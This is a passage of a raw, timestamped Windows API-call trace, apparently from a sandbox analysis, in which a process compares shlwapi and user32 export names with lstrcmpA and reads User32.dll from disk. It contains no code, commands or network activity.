[0252.943] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0252.944] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0252.944] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0252.944] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0252.945] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0252.945] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0252.945] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0252.946] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0252.946] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0252.947] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0252.947] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0252.947] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0252.947] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0252.947] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0252.948] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0252.949] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0252.949] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0253.091] GetProcessHeap () returned 0x430000 [0253.091] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c95030 | out: hHeap=0x430000) returned 1 [0253.091] GetProcessHeap () returned 0x430000 [0253.091] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449940 [0253.091] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0253.091] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0253.091] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0253.091] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0253.092] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0253.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0253.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0253.092] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0253.092] GetProcessHeap () returned 0x430000 [0253.092] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1555b8) returned 0x4050040 [0253.095] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0253.096] ReadFile (in: hFile=0x17c, lpBuffer=0x4050040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4050040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0253.115] CloseHandle (hObject=0x17c) returned 1 [0253.115] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0253.115] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0253.115] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0253.115] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0253.115] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0253.115] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0253.115] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0253.115] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0253.115] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0253.115] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0253.116] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0253.116] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0253.116] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0253.116] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0253.116] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0253.116] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0253.116] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0253.116] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0253.117] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0253.117] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0253.117] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0253.117] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0253.117] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0253.118] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0253.118] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0253.118] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0253.118] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0253.119] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0253.119] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0253.120] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0253.120] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0253.120] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0253.120] lstrcmpA 